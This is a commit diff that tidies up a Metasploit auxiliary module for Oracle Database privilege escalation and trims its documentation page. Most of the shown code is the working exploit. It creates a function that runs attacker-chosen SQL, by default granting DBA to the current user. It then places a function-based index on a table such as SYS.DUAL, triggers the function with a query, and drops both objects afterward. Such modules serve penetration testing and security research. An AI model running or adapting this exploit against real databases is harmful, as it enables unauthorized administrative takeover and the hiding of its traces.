Clean up module
William Vu
parent
bd41895fc4
commit
d0f1f72426
|
|
@ -26,10 +26,3 @@
|
|||
**TABLE**
|
||||
|
||||
Table to create the index on.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Escalating an Oracle SQL account to database administrator privileges.
|
||||
|
||||
```
|
||||
```
|
||||
|
|
|
|||
|
|
@ -9,9 +9,11 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Oracle DB Privilege Escalation via function-based index',
|
||||
'Name' => 'Oracle DB Privilege Escalation via Function-Based Index',
|
||||
'Description' => %q{
|
||||
This module will escalate an Oracle DB user to DBA by creating a function-based index on a table owned by a more-privileged user. Credits to David Litchfield for publishing the technique.
|
||||
This module will escalate an Oracle DB user to DBA by creating a
|
||||
function-based index on a table owned by a more-privileged user.
|
||||
Credits to David Litchfield for publishing the technique.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
|
@ -25,11 +27,11 @@ class MetasploitModule < Msf::Auxiliary
|
|||
],
|
||||
'DisclosureDate' => 'Jan 21 2015'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SQL', [ true, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]),
|
||||
OptString.new('TABLE', [ true, 'Table to create the index on.', "SYS.DUAL"]),
|
||||
])
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SQL', [ true, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}" ]),
|
||||
OptString.new('TABLE', [ true, 'Table to create the index on.', 'SYS.DUAL' ]),
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
@ -37,52 +39,51 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
func_name = Rex::Text.rand_text_alpha(6..10)
|
||||
|
||||
create_function = "
|
||||
create_function = <<-EOF
|
||||
CREATE OR REPLACE FUNCTION #{func_name}
|
||||
(FOO varchar) return varchar
|
||||
deterministic authid current_user is
|
||||
pragma autonomous_transaction;
|
||||
begin
|
||||
execute immediate '#{datastore['SQL']}';
|
||||
execute immediate '#{datastore['SQL'].gsub("'", "\\\\'")}';
|
||||
commit;
|
||||
return '';
|
||||
end;
|
||||
"
|
||||
EOF
|
||||
|
||||
index_name = Rex::Text.rand_text_alpha(6..10)
|
||||
param_value = Rex::Text.rand_text_alpha(2..6)
|
||||
|
||||
create_index = "
|
||||
CREATE INDEX #{index_name} ON
|
||||
#{datastore['TABLE']}(#{datastore['DBUSER']}.#{func_name}('#{param_value}'))"
|
||||
create_index = "CREATE INDEX #{index_name} ON " \
|
||||
"#{datastore['TABLE']}(#{datastore['DBUSER']}.#{func_name}('#{param_value}'))"
|
||||
|
||||
trigger = "SELECT * FROM #{datastore['TABLE']}"
|
||||
|
||||
clean_index = "drop index #{index_name}"
|
||||
clean_func = "drop function #{func_name}"
|
||||
|
||||
print_status("Running exploit...")
|
||||
print_status('Running exploit...')
|
||||
|
||||
begin
|
||||
print_status("Attempting to create function #{func_name}...")
|
||||
print_status(create_function)
|
||||
prepare_exec(create_function)
|
||||
print_status("Attempting to create index #{index_name}...")
|
||||
print_status(create_index)
|
||||
prepare_exec(create_index)
|
||||
print_status("Querying to trigger function...")
|
||||
print_status(trigger)
|
||||
print_status('Querying to trigger function...')
|
||||
prepare_exec(trigger)
|
||||
print_status("Cleaning up index...")
|
||||
print_status(clean_index)
|
||||
print_status('Cleaning up index...')
|
||||
prepare_exec(clean_index)
|
||||
print_status("Cleaning up function...")
|
||||
print_status(clean_func)
|
||||
print_status('Cleaning up function...')
|
||||
prepare_exec(clean_func)
|
||||
print_status("Exploit complete!")
|
||||
print_status('Exploit complete!')
|
||||
rescue ::OCIError => e
|
||||
print_error("Error! #{e.message}")
|
||||
end
|
||||
end
|
||||
|
||||
def prepare_exec(query)
|
||||
print_status(query)
|
||||
super
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue